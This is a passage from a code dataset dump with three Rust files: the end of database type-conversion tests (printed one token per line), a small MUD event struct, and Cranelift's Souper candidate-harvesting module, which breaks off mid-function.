]
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
)
VALUES
(
?
1
)
"
[
&
v1234
]
)
?
;
let
v
:
Vec
<
u8
>
=
db
.
one_column
(
"
SELECT
b
FROM
foo
"
)
?
;
assert_eq
!
(
v
v1234
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_empty_blob
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
empty
=
vec
!
[
]
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
)
VALUES
(
?
1
)
"
[
&
empty
]
)
?
;
let
v
:
Vec
<
u8
>
=
db
.
one_column
(
"
SELECT
b
FROM
foo
"
)
?
;
assert_eq
!
(
v
empty
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_str
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
s
=
"
hello
world
!
"
;
db
.
execute
(
"
INSERT
INTO
foo
(
t
)
VALUES
(
?
1
)
"
[
&
s
]
)
?
;
let
from
:
String
=
db
.
one_column
(
"
SELECT
t
FROM
foo
"
)
?
;
assert_eq
!
(
from
s
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_string
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
s
=
"
hello
world
!
"
;
db
.
execute
(
"
INSERT
INTO
foo
(
t
)
VALUES
(
?
1
)
"
[
s
.
to_owned
(
)
]
)
?
;
let
from
:
String
=
db
.
one_column
(
"
SELECT
t
FROM
foo
"
)
?
;
assert_eq
!
(
from
s
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_value
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
i
)
VALUES
(
?
1
)
"
[
Value
:
:
Integer
(
10
)
]
)
?
;
assert_eq
!
(
10i64
db
.
one_column
:
:
<
i64
>
(
"
SELECT
i
FROM
foo
"
)
?
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_option
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
s
=
Some
(
"
hello
world
!
"
)
;
let
b
=
Some
(
vec
!
[
1u8
2
3
4
]
)
;
db
.
execute
(
"
INSERT
INTO
foo
(
t
)
VALUES
(
?
1
)
"
[
&
s
]
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
)
VALUES
(
?
1
)
"
[
&
b
]
)
?
;
let
mut
stmt
=
db
.
prepare
(
"
SELECT
t
b
FROM
foo
ORDER
BY
ROWID
ASC
"
)
?
;
let
mut
rows
=
stmt
.
query
(
[
]
)
?
;
{
let
row1
=
rows
.
next
(
)
?
.
unwrap
(
)
;
let
s1
:
Option
<
String
>
=
row1
.
get_unwrap
(
0
)
;
let
b1
:
Option
<
Vec
<
u8
>
>
=
row1
.
get_unwrap
(
1
)
;
assert_eq
!
(
s
.
unwrap
(
)
s1
.
unwrap
(
)
)
;
assert
!
(
b1
.
is_none
(
)
)
;
}
{
let
row2
=
rows
.
next
(
)
?
.
unwrap
(
)
;
let
s2
:
Option
<
String
>
=
row2
.
get_unwrap
(
0
)
;
let
b2
:
Option
<
Vec
<
u8
>
>
=
row2
.
get_unwrap
(
1
)
;
assert
!
(
s2
.
is_none
(
)
)
;
assert_eq
!
(
b
b2
)
;
}
Ok
(
(
)
)
}
#
[
test
]
#
[
allow
(
clippy
:
:
cognitive_complexity
)
]
fn
test_mismatched_types
(
)
-
>
Result
<
(
)
>
{
fn
is_invalid_column_type
(
err
:
Error
)
-
>
bool
{
matches
!
(
err
Error
:
:
InvalidColumnType
(
.
.
)
)
}
let
db
=
checked_memory_handle
(
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
t
i
f
)
VALUES
(
X
'
0102
'
'
text
'
1
1
.
5
)
"
[
]
)
?
;
let
mut
stmt
=
db
.
prepare
(
"
SELECT
b
t
i
f
n
FROM
foo
"
)
?
;
let
mut
rows
=
stmt
.
query
(
[
]
)
?
;
let
row
=
rows
.
next
(
)
?
.
unwrap
(
)
;
assert_eq
!
(
vec
!
[
1
2
]
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
0
)
?
)
;
assert_eq
!
(
"
text
"
row
.
get
:
:
<
_
String
>
(
1
)
?
)
;
assert_eq
!
(
1
row
.
get
:
:
<
_
c_int
>
(
2
)
?
)
;
assert
!
(
(
1
.
5
-
row
.
get
:
:
<
_
c_double
>
(
3
)
?
)
.
abs
(
)
<
f64
:
:
EPSILON
)
;
assert_eq
!
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
4
)
?
None
)
;
assert_eq
!
(
row
.
get
:
:
<
_
Option
<
c_double
>
>
(
4
)
?
None
)
;
assert_eq
!
(
row
.
get
:
:
<
_
Option
<
String
>
>
(
4
)
?
None
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
0
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_double
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
0
)
.
unwrap_err
(
)
)
)
;
#
[
cfg
(
feature
=
"
time
"
)
]
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
time
:
:
OffsetDateTime
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
0
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
1
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_double
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
1
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
2
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
2
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
String
>
>
(
2
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
3
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Option
<
c_int
>
>
(
3
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_int
>
(
4
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
i64
>
(
4
)
.
err
(
)
.
unwrap
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
c_double
>
(
4
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
String
>
(
4
)
.
unwrap_err
(
)
)
)
;
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
Vec
<
u8
>
>
(
4
)
.
unwrap_err
(
)
)
)
;
#
[
cfg
(
feature
=
"
time
"
)
]
assert
!
(
is_invalid_column_type
(
row
.
get
:
:
<
_
time
:
:
OffsetDateTime
>
(
4
)
.
unwrap_err
(
)
)
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_dynamic_type
(
)
-
>
Result
<
(
)
>
{
use
super
:
:
Value
;
let
db
=
checked_memory_handle
(
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
t
i
f
)
VALUES
(
X
'
0102
'
'
text
'
1
1
.
5
)
"
[
]
)
?
;
let
mut
stmt
=
db
.
prepare
(
"
SELECT
b
t
i
f
n
FROM
foo
"
)
?
;
let
mut
rows
=
stmt
.
query
(
[
]
)
?
;
let
row
=
rows
.
next
(
)
?
.
unwrap
(
)
;
assert_eq
!
(
Value
:
:
Blob
(
vec
!
[
1
2
]
)
row
.
get
:
:
<
_
Value
>
(
0
)
?
)
;
assert_eq
!
(
Value
:
:
Text
(
String
:
:
from
(
"
text
"
)
)
row
.
get
:
:
<
_
Value
>
(
1
)
?
)
;
assert_eq
!
(
Value
:
:
Integer
(
1
)
row
.
get
:
:
<
_
Value
>
(
2
)
?
)
;
match
row
.
get
:
:
<
_
Value
>
(
3
)
?
{
Value
:
:
Real
(
val
)
=
>
assert
!
(
(
1
.
5
-
val
)
.
abs
(
)
<
f64
:
:
EPSILON
)
x
=
>
panic
!
(
"
Invalid
Value
{
:
?
}
"
x
)
}
assert_eq
!
(
Value
:
:
Null
row
.
get
:
:
<
_
Value
>
(
4
)
?
)
;
Ok
(
(
)
)
}
macro_rules
!
test_conversion
{
(
db_etc
:
ident
insert_value
:
expr
get_type
:
ty
expect
expected_value
:
expr
)
=
>
{
db_etc
.
insert_statement
.
execute
(
params
!
[
insert_value
]
)
?
;
let
res
=
db_etc
.
query_statement
.
query_row
(
[
]
|
row
|
row
.
get
:
:
<
_
get_type
>
(
0
)
)
;
assert_eq
!
(
res
?
expected_value
)
;
db_etc
.
delete_statement
.
execute
(
[
]
)
?
;
}
;
(
db_etc
:
ident
insert_value
:
expr
get_type
:
ty
expect_from_sql_error
)
=
>
{
db_etc
.
insert_statement
.
execute
(
params
!
[
insert_value
]
)
?
;
let
res
=
db_etc
.
query_statement
.
query_row
(
[
]
|
row
|
row
.
get
:
:
<
_
get_type
>
(
0
)
)
;
res
.
unwrap_err
(
)
;
db_etc
.
delete_statement
.
execute
(
[
]
)
?
;
}
;
(
db_etc
:
ident
insert_value
:
expr
get_type
:
ty
expect_to_sql_error
)
=
>
{
db_etc
.
insert_statement
.
execute
(
params
!
[
insert_value
]
)
.
unwrap_err
(
)
;
}
;
}
#
[
test
]
fn
test_numeric_conversions
(
)
-
>
Result
<
(
)
>
{
#
!
[
allow
(
clippy
:
:
float_cmp
)
]
let
db
=
Connection
:
:
open_in_memory
(
)
?
;
db
.
execute_batch
(
"
CREATE
TABLE
foo
(
x
)
"
)
?
;
struct
DbEtc
<
'
conn
>
{
insert_statement
:
Statement
<
'
conn
>
query_statement
:
Statement
<
'
conn
>
delete_statement
:
Statement
<
'
conn
>
}
let
mut
db_etc
=
DbEtc
{
insert_statement
:
db
.
prepare
(
"
INSERT
INTO
foo
VALUES
(
?
1
)
"
)
?
query_statement
:
db
.
prepare
(
"
SELECT
x
FROM
foo
"
)
?
delete_statement
:
db
.
prepare
(
"
DELETE
FROM
foo
"
)
?
}
;
test_conversion
!
(
db_etc
0u8
u8
expect
0u8
)
;
test_conversion
!
(
db_etc
100u8
i8
expect
100i8
)
;
test_conversion
!
(
db_etc
200u8
u8
expect
200u8
)
;
test_conversion
!
(
db_etc
100u16
i8
expect
100i8
)
;
test_conversion
!
(
db_etc
200u16
u8
expect
200u8
)
;
test_conversion
!
(
db_etc
u32
:
:
MAX
u64
expect
u32
:
:
MAX
as
u64
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
i64
expect
i64
:
:
MIN
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
i64
expect
i64
:
:
MAX
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
u64
expect
i64
:
:
MAX
as
u64
)
;
test_conversion
!
(
db_etc
100usize
usize
expect
100usize
)
;
test_conversion
!
(
db_etc
100u64
u64
expect
100u64
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
as
u64
u64
expect
i64
:
:
MAX
as
u64
)
;
test_conversion
!
(
db_etc
200u8
i8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
400u16
i8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
400u16
u8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
-
1i8
u8
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
u64
expect_from_sql_error
)
;
test_conversion
!
(
db_etc
u64
:
:
MAX
i64
expect_to_sql_error
)
;
test_conversion
!
(
db_etc
u64
:
:
MAX
u64
expect_to_sql_error
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
as
u64
+
1
u64
expect_to_sql_error
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
f32
expect
i64
:
:
MIN
as
f32
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
f32
expect
i64
:
:
MAX
as
f32
)
;
test_conversion
!
(
db_etc
i64
:
:
MIN
f64
expect
i64
:
:
MIN
as
f64
)
;
test_conversion
!
(
db_etc
i64
:
:
MAX
f64
expect
i64
:
:
MAX
as
f64
)
;
test_conversion
!
(
db_etc
0f64
i64
expect_from_sql_error
)
;
Ok
(
(
)
)
}
}
| true |
9ff53f52ccae742d9e4a50ed2383f9c434363a12
|
Rust
|
ncatelli/mud
|
/mud/src/web/event.rs
|
UTF-8
| 611 | 3.046875 | 3 |
[] |
no_license
|
extern crate serde;
extern crate serde_json;
#[derive(Serialize, Deserialize, Debug, Clone)]
pub enum EventType {
Game,
}
#[derive(Serialize, Deserialize, Debug)]
pub struct Event {
event: EventType,
message: String,
}
#[allow(dead_code)]
impl Event {
#[allow(dead_code)]
pub fn new(event: EventType, message: String) -> Event {
Event {
event: event,
message: message,
}
}
#[allow(dead_code)]
pub fn event(&self) -> EventType {
self.event.clone()
}
pub fn message(&self) -> String {
self.message.clone()
}
}
| true |
3b8693c714310223e84a274523d1a8c4b0426baf
|
Rust
|
bytecodealliance/wasmtime
|
/cranelift/codegen/src/souper_harvest.rs
|
UTF-8
| 26,128 | 3.21875 | 3 |
[
"LLVM-exception",
"Apache-2.0"
] |
permissive
|
//! Harvest left-hand side superoptimization candidates.
//!
//! Given a clif function, harvest all its integer subexpressions, so that they
//! can be fed into [Souper](https://github.com/google/souper) as candidates for
//! superoptimization. For some of these candidates, Souper will successfully
//! synthesize a right-hand side that is equivalent but has lower cost than the
//! left-hand side. Then, we can combine these left- and right-hand sides into a
//! complete optimization, and add it to our peephole passes.
//!
//! To harvest the expression that produced a given value `x`, we do a
//! post-order traversal of the dataflow graph starting from `x`. As we do this
//! traversal, we maintain a map from clif values to their translated Souper
//! values. We stop traversing when we reach anything that can't be translated
//! into Souper IR: a memory load, a float-to-int conversion, a block parameter,
//! etc. For values produced by these instructions, we create a Souper `var`,
//! which is an input variable to the optimization. For instructions that have a
//! direct mapping into Souper IR, we get the Souper version of each of its
//! operands and then create the Souper version of the instruction itself. It
//! should now be clear why we do a post-order traversal: we need an
//! instruction's translated operands in order to translate the instruction
//! itself. Once this instruction is translated, we update the clif-to-souper
//! map with this new translation so that any other instruction that uses this
//! result as an operand has access to the translated value. When the traversal
//! is complete we return the translation of `x` as the root of left-hand side
//! candidate.
use crate::ir;
use souper_ir::ast;
use std::collections::{HashMap, HashSet};
use std::string::String;
use std::sync::mpsc;
use std::vec::Vec;
/// Harvest Souper left-hand side candidates from the given function.
///
/// Candidates are reported through the given MPSC sender.
pub fn do_souper_harvest(func: &ir::Function, out: &mut mpsc::Sender<String>) {
let mut allocs = Allocs::default();
// Iterate over each instruction in each block and try and harvest a
// left-hand side from its result.
for block in func.layout.blocks() {
let mut option_inst = func.layout.first_inst(block);
while let Some(inst) = option_inst {
let results = func.dfg.inst_results(inst);
if results.len() == 1 {
let val = results[0];
let ty = func.dfg.value_type(val);
if ty.is_int() && ty.lane_count() == 1 {
harvest_candidate_lhs(&mut allocs, func, val, out);
}
}
option_inst = func.layout.next_inst(inst);
}
}
}
/// Allocations that we reuse across many LHS candidate harvests.
#[derive(Default)]
struct Allocs {
/// A map from cranelift IR to souper IR for values that we've already
/// translated into souper IR.
ir_to_souper_val: HashMap<ir::Value, ast::ValueId>,
/// Stack of to-visit and to-trace values for the post-order DFS.
dfs_stack: Vec<StackEntry>,
/// Set of values we've already seen in our post-order DFS.
dfs_seen: HashSet<ir::Value>,
}
impl Allocs {
/// Reset the collections to their empty state (without deallocating their
/// backing data).
fn reset(&mut self) {
self.ir_to_souper_val.clear();
self.dfs_stack.clear();
self.dfs_seen.clear();
}
}
/// Harvest a candidate LHS for `val` from the dataflow graph.
fn harvest_candidate_lhs(
allocs: &mut Allocs,
func: &ir::Function,
val: ir::Value,
out: &mut mpsc::Sender<String>,
) {
allocs.reset();
let mut lhs = ast::LeftHandSideBuilder::default();
let mut non_var_count = 0;
// Should we keep tracing through the given `val`? Only if it is defined
// by an instruction that we can translate to Souper IR.
let should_trace = |val| match func.dfg.value_def(val) {
ir::ValueDef::Result(inst, 0) => match func.dfg.insts[inst].opcode() {
ir::Opcode::Iadd
| ir::Opcode::IaddImm
| ir::Opcode::IrsubImm
| ir::Opcode::Imul
| ir::Opcode::ImulImm
| ir::Opcode::Udiv
| ir::Opcode::UdivImm
| ir::Opcode::Sdiv
| ir::Opcode::SdivImm
| ir::Opcode::Urem
| ir::Opcode::UremImm
| ir::Opcode::Srem
| ir::Opcode::SremImm
| ir::Opcode::Band
| ir::Opcode::BandImm
| ir::Opcode::Bor
| ir::Opcode::BorImm
| ir::Opcode::Bxor
| ir::Opcode::BxorImm
| ir::Opcode::Ishl
| ir::Opcode::IshlImm
| ir::Opcode::Sshr
| ir::Opcode::SshrImm
| ir::Opcode::Ushr
| ir::Opcode::UshrImm
| ir::Opcode::Select
| ir::Opcode::Uextend
| ir::Opcode::Sextend
| ir::Opcode::Trunc
| ir::Opcode::Icmp
| ir::Opcode::Popcnt
| ir::Opcode::Bitrev
| ir::Opcode::Clz
| ir::Opcode::Ctz
// TODO: ir::Opcode::IaddCarry
| ir::Opcode::SaddSat
| ir::Opcode::SsubSat
| ir::Opcode::UsubSat => true,
_ => false,
},
_ => false,
};
post_order_dfs(allocs, &func.dfg, val, should_trace, |allocs, val| {
let souper_assignment_rhs = match func.dfg.value_def(val) {
ir::ValueDef::Result(inst, 0) => {
let args = func.dfg.inst_args(inst);
// Get the n^th argument as a souper operand.
let arg = |allocs: &mut Allocs, n| {
let arg = args[n];
if let Some(a) = allocs.ir_to_souper_val.get(&arg).copied() {
a.into()
} else {
// The only arguments we get that we haven't already
// converted into a souper instruction are `iconst`s.
// This is because souper only allows
// constants as operands, and it doesn't allow assigning
// constants to a variable name. So we lazily convert
// `iconst`s into souper operands here,
// when they are actually used.
match func.dfg.value_def(arg) {
ir::ValueDef::Result(inst, 0) => match func.dfg.insts[inst] {
ir::InstructionData::UnaryImm { opcode, imm } => {
debug_assert_eq!(opcode, ir::Opcode::Iconst);
let imm: i64 = imm.into();
ast::Operand::Constant(ast::Constant {
value: imm.into(),
r#type: souper_type_of(&func.dfg, arg),
})
}
_ => unreachable!(
"only iconst instructions \
aren't in `ir_to_souper_val`"
),
},
_ => unreachable!(
"only iconst instructions \
aren't in `ir_to_souper_val`"
),
}
}
};
match (func.dfg.insts[inst].opcode(), &func.dfg.insts[inst]) {
(ir::Opcode::Iadd, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Add { a, b }.into()
}
(ir::Opcode::IaddImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Add { a, b }.into()
}
(ir::Opcode::IrsubImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let b = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let a = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Sub { a, b }.into()
}
(ir::Opcode::Imul, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Mul { a, b }.into()
}
(ir::Opcode::ImulImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Mul { a, b }.into()
}
(ir::Opcode::Udiv, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Udiv { a, b }.into()
}
(ir::Opcode::UdivImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Udiv { a, b }.into()
}
(ir::Opcode::Sdiv, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Sdiv { a, b }.into()
}
(ir::Opcode::SdivImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Sdiv { a, b }.into()
}
(ir::Opcode::Urem, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Urem { a, b }.into()
}
(ir::Opcode::UremImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Urem { a, b }.into()
}
(ir::Opcode::Srem, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Srem { a, b }.into()
}
(ir::Opcode::SremImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Srem { a, b }.into()
}
(ir::Opcode::Band, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::And { a, b }.into()
}
(ir::Opcode::BandImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::And { a, b }.into()
}
(ir::Opcode::Bor, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Or { a, b }.into()
}
(ir::Opcode::BorImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Or { a, b }.into()
}
(ir::Opcode::Bxor, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Xor { a, b }.into()
}
(ir::Opcode::BxorImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Xor { a, b }.into()
}
(ir::Opcode::Ishl, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Shl { a, b }.into()
}
(ir::Opcode::IshlImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Shl { a, b }.into()
}
(ir::Opcode::Sshr, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Ashr { a, b }.into()
}
(ir::Opcode::SshrImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Ashr { a, b }.into()
}
(ir::Opcode::Ushr, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::Lshr { a, b }.into()
}
(ir::Opcode::UshrImm, ir::InstructionData::BinaryImm64 { imm, .. }) => {
let a = arg(allocs, 0);
let value: i64 = (*imm).into();
let value: i128 = value.into();
let b = ast::Constant {
value,
r#type: souper_type_of(&func.dfg, val),
}
.into();
ast::Instruction::Lshr { a, b }.into()
}
(ir::Opcode::Select, _) => {
let a = arg(allocs, 0);
// While Cranelift allows any width condition for
// `select` and checks it against `0`, Souper requires
// an `i1`. So insert a `ne %x, 0` as needed.
let a = match a {
ast::Operand::Value(id) => match lhs.get_value(id).r#type {
Some(ast::Type { width: 1 }) => a,
_ => lhs
.assignment(
None,
Some(ast::Type { width: 1 }),
ast::Instruction::Ne {
a,
b: ast::Constant {
value: 0,
r#type: None,
}
.into(),
},
vec![],
)
.into(),
},
ast::Operand::Constant(ast::Constant { value, .. }) => ast::Constant {
value: (value != 0) as _,
r#type: Some(ast::Type { width: 1 }),
}
.into(),
};
let b = arg(allocs, 1);
let c = arg(allocs, 2);
ast::Instruction::Select { a, b, c }.into()
}
(ir::Opcode::Uextend, _) => {
let a = arg(allocs, 0);
ast::Instruction::Zext { a }.into()
}
(ir::Opcode::Sextend, _) => {
let a = arg(allocs, 0);
ast::Instruction::Sext { a }.into()
}
(ir::Opcode::Trunc, _) => {
let a = arg(allocs, 0);
ast::Instruction::Trunc { a }.into()
}
(ir::Opcode::Icmp, ir::InstructionData::IntCompare { cond, .. })
| (ir::Opcode::IcmpImm, ir::InstructionData::IntCompare { cond, .. }) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
match cond {
ir::condcodes::IntCC::Equal => ast::Instruction::Eq { a, b }.into(),
ir::condcodes::IntCC::NotEqual => ast::Instruction::Ne { a, b }.into(),
ir::condcodes::IntCC::UnsignedLessThan => {
ast::Instruction::Ult { a, b }.into()
}
ir::condcodes::IntCC::SignedLessThan => {
ast::Instruction::Slt { a, b }.into()
}
ir::condcodes::IntCC::UnsignedLessThanOrEqual => {
ast::Instruction::Sle { a, b }.into()
}
ir::condcodes::IntCC::SignedLessThanOrEqual => {
ast::Instruction::Sle { a, b }.into()
}
_ => ast::AssignmentRhs::Var,
}
}
(ir::Opcode::Popcnt, _) => {
let a = arg(allocs, 0);
ast::Instruction::Ctpop { a }.into()
}
(ir::Opcode::Bitrev, _) => {
let a = arg(allocs, 0);
ast::Instruction::BitReverse { a }.into()
}
(ir::Opcode::Clz, _) => {
let a = arg(allocs, 0);
ast::Instruction::Ctlz { a }.into()
}
(ir::Opcode::Ctz, _) => {
let a = arg(allocs, 0);
ast::Instruction::Cttz { a }.into()
}
// TODO: ir::Opcode::IaddCarry
(ir::Opcode::SaddSat, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::SaddSat { a, b }.into()
}
(ir::Opcode::SsubSat, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::SsubSat { a, b }.into()
}
(ir::Opcode::UsubSat, _) => {
let a = arg(allocs, 0);
let b = arg(allocs, 1);
ast::Instruction::UsubSat { a, b }.into()
}
// Because Souper doesn't allow constants to be on the right
// hand side of an assignment (i.e. `%0:i32 = 1234` is
// disallowed) we have to ignore `iconst`
// instructions until we process them as operands for some
// other instruction. See the `arg` closure above for
// details.
(ir::Opcode::Iconst, _) => return,
_ => ast::AssignmentRhs::Var,
}
}
_ => ast::AssignmentRhs::Var,
};
non_var_count += match souper_assignment_rhs {
ast::AssignmentRhs::Var => 0,
_ => 1,
};
let souper_ty = souper_type_of(&func.dfg, val);
let souper_val = lhs.assignment(None, souper_ty, souper_assignment_rhs, vec![]);
let old_value = allocs.ir_to_souper_val.insert(val, souper_val);
assert!(old_value.is_none());
});
// We end up harvesting a lot of candidates like:
//
// %0:i32 = var
// infer %0
//
// and
//
// %0:i32 = var
// %1:i32 = var
// %2:i32 = add %0, %1
//
// Both of these are useless. Only actually harvest the candidate if there
// are at least two actual operations.
if non_var_count >= 2 {
let lhs = lhs.finish(allocs.ir_to_souper_val[&val], None);
out.send(format!(
";; Harvested from `{}` in `{}`\n{}\n",
val, func.name, lhs
))
.unwrap();
}
}
fn souper_type_of(dfg: &ir::DataFlowGraph, val: ir::Value) -> Option<ast::Type> {
let ty = dfg.value_type(val);
assert!(ty.is_int());
assert_eq!(ty.lane_count(), 1);
let width = match dfg.value_def(val).inst() {
Some(inst)
if dfg.insts[inst].opcode() == ir::Opcode::IcmpImm
|| dfg.insts[inst].opcode() == ir::Opcode::Icmp =>
{
1
}
_ => ty.bits().try_into().unwrap(),
};
Some(ast::Type { width })
}
#[derive(Debug)]
enum StackEntry {
Visit(ir::Value),
Trace(ir::Value),
}
fn post_order_dfs(
allocs: &mut Allocs,
dfg: &ir::DataFlowGraph,
val: ir::Value,
